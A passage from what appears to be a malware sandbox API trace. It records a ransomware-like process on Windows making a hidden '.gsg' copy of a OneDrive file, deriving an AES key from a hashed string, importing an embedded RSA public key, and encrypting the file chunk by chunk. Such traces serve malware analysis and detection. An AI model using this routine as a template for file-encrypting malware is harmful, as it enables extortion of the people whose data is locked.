"c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fa\\filesync.localizedresources.dll.mui")) returned 0x20 [0274.988] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fa\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0274.989] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fa\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fa\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0274.990] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fa\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fa\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0274.992] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fa\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0274.992] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f2a0e0) returned 1 [0274.994] CryptCreateHash (in: hProv=0x2f2a0e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0274.994] lstrlenA (lpString="CABLQIHbnDAxPSPigSVgweTqzMlQm") returned 29 [0274.994] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb558, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0274.994] CryptDeriveKey (in: hProv=0x2f2a0e0, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb208) returned 1 [0274.994] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0274.994] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0274.994] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2a850) returned 1 [0274.995] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2a850, dwCertEncodingType=0x1, pInfo=0x2f33bc0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f33bf0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f33bf8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fb588) returned 1 [0274.995] CryptEncrypt (in: hKey=0x2fb588, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0274.995] CryptEncrypt (in: hKey=0x2fb588, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2a388*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2a388*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0274.995] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f2a388*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2a388*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0274.996] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.112] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.112] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.114] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.114] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.114] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.114] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.114] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.114] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.114] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.114] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.114] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.114] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.115] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.115] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.115] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.115] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.115] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.115] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.115] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.116] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.116] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.116] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.116] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.116] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.116] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.116] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.116] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.117] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.117] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.117] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.117] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.117] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.117] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.117] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.117] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.117] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.117] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.117] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.117] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.118] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.118] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.118] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.118] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.118] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.118] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.119] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.119] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.119] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.119] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.119] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.119] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.119] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.119] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.119] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.120] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.120] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.120] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.120] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.120] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.120] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.120] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.121] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.121] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.121] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.121] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.121] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.121] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.121] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.122] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.122] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.122] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.122] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.122] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.122] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.122] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.122] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.122] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.122] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.122] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.122] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.122] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.123] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.123] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.123] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, 